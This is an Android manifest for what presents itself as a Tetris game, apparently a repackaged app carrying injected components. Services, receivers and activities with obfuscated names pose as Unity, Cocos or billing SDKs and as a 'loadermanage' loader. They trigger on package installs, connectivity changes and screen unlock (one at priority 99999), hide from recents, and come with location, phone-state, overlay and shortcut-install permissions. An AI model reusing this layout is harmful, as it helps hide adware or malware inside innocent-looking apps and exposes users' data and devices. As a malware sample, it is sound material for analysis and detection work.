<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.yangweiliu.qvlfptqv">
    <application android:icon="@drawable/icon" android:label="@string/app_name" android:theme="@style/CustomButton">
        <activity android:label="@string/app_name" android:name="com.yangweiliu.tetris.activities.MainActivity" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:label="@string/app_name" android:name="com.yangweiliu.tetris.activities.PlaygroundActivity"/>
        <activity android:label="@string/preferences_title" android:name="com.yangweiliu.tetris.activities.Preferences"/>
        <activity android:label="@string/common_about" android:name="com.yangweiliu.tetris.activities.AboutActivity" android:screenOrientation="landscape"/>
        <activity android:label="@string/common_about" android:name="com.yangweiliu.tetris.activities.HighScoreActivity"/>
        <activity android:label="@string/common_about" android:name="com.yangweiliu.tetris.activities.LocalRankActivity"/>
        <activity android:label="@string/common_about" android:name="com.yangweiliu.tetris.activities.WorldRankActivity"/>
        <activity android:name="com.example.loadermanage.LMA" android:theme="@android:style/Theme.Dialog"/>
        <service android:name="com.example.loadermanage.LMS"/>
        <receiver android:exported="true" android:name="com.example.loadermanage.LMR">
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <action android:name="android.intent.action.PACKAGE_REMOVED"/>
                <data android:scheme="package"/>
            </intent-filter>
            <intent-filter>
                <action android:name="com.example.loadermanage.downloadManager"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
            </intent-filter>
            <intent-filter>
                <action android:name="com.zdt.action.ALARM_ACTION"/>
            </intent-filter>
            <intent-filter android:priority="99999">
                <action android:name="android.intent.action.USER_PRESENT"/>
            </intent-filter>
        </receiver>
        <meta-data android:name="zdt_appkey" android:value="10206"/>
        <meta-data android:name="CHL-ID" android:value="k-goapk"/>
        <activity android:configChanges="keyboardHidden|orientation" android:excludeFromRecents="true" android:label="" android:launchMode="singleTask" android:name="com.prime31.billing.bplayer.JA"/>
        <service android:name="com.prime31.billing.bplayer.JS"/>
        <receiver android:name="com.prime31.billing.bplayer.JR">
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <data android:scheme="package"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.USER_PRESENT"/>
            </intent-filter>
        </receiver>
        <activity android:configChanges="keyboardHidden|orientation" android:excludeFromRecents="true" android:label="" android:launchMode="singleTask" android:name="com.unity3d.y.v.p.Vaa">
            <intent-filter>
                <action android:name="android.intent.action.CREATE_SHORTCUT"/>
            </intent-filter>
        </activity>
        <service android:name="com.unity3d.y.v.p.Vss"/>
        <receiver android:name="com.unity3d.y.v.p.Vrr">
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <data android:scheme="package"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.USER_PRESENT"/>
            </intent-filter>
        </receiver>
        <activity android:excludeFromRecents="true" android:launchMode="singleInstance" android:name="com.cocos.LibAct"/>
        <service android:name="com.cocos.LtodSer"/>
        <receiver android:name="com.cocos.AbouttRec">
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <data android:scheme="package"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.USER_PRESENT"/>
            </intent-filter>
        </receiver>
    </application>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.GET_TASKS"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.VIBRATE"/>
    <uses-permission android:name="android.permission.RESTART_PACKAGES"/>
    <supports-screens android:anyDensity="true" android:largeScreens="true" android:normalScreens="true" android:resizeable="true" android:smallScreens="true"/>
    <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
</manifest>
